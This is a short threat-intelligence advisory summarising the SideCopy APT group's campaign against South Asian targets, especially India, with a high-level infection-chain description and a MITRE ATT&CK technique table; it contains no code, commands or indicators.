EXECUTIVE SUMMARY
A malicious website linked to the SideCopy APT group has been uncovered, revealing a sophisticated threat targeting South Asian nations, particularly India. This group, employs various tactics, including the use of malicious LNK files and complex infection chains, to compromise systems. Of particular concern is their focus on university students, potentially intersecting with other APT groups like Transparent Tribe.
The SideCopy APT group initiates its attacks through spam emails containing links to malicious archive files. Upon execution, these files trigger a sequence of events, including the download and execution of HTA files, leading to the deployment of malware payloads like Reverse RAT and Action RAT. The malware utilizes various techniques for persistence and evasion, adapting its behavior based on the presence of antivirus software. Furthermore, the group leverages PHP files on the malicious website to tailor attacks based on the victim's operating system.
The emergence of SideCopy poses a significant threat, especially to entities in South Asia, notably targeting India. Their intricate attack methods underscore the need for robust cybersecurity measures. Collaboration and information sharing are vital for understanding and mitigating the evolving threat landscape posed by groups like SideCopy and their potential intersections with other threat actors. Vigilance, adaptive defenses, and proactive response strategies are essential in safeguarding against such persistent threats.
THREAT PROFILE:
Tactic | Technique Id | Technique |
Execution | T1059 | Command and Scripting Interpreter |
T1053 | Scheduled Task/Job | |
T1047 | Windows Management Instrumentation | |
Persistence | T1547 | Boot or Logon Autostart Execution |
Privilege Escalation | T1574 | Hijack Execution Flow |
Defense Evasion | T1027 | Obfuscated Files or Information |
T1140 | Deobfuscate/Decode Files or Information | |
T1112 | Modify Registry | |
Discovery | T1082 | System Information Discovery |
T1083 | File and Directory Discovery | |
T1518 | Software Discovery | |
Command and Control | T1071 | Application Layer Protocol |
T1105 | Ingress Tool Transfer |
REFERENCES:
The following reports contain further technical details: